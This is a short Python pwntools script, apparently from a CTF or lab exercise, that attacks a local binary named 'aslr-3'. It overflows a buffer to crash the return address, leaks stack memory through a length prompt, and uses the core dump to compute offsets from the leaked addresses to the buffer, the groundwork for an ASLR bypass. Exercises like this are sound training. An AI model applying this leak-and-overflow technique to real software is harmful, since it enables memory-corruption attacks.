#!/usr/bin/env python import re from pwn import * p = process('./aslr-3') # generate a crash at 0x41414141 at the return p.sendline("A"*0x90) # read 256 bytes print(p.recvuntil('print?\n')) p.sendline('256') # receive enough bytes data = p.recv(0x200) # cut 'A'*0x90 and 'Hello !\n', 144 bytes at the start and 8 bytes at the end. raw_data = data[144:-8] # get potential addresses as integer addrs = [u32(raw_data[i:i+4]) for i in xrange(0, len(raw_data), 4)] # wait until the program crashes p.wait() c = Core('core') buffer_addr = c.stack.find('A'*0x90) offsets = [addr - buffer_addr for addr in addrs] print(offsets)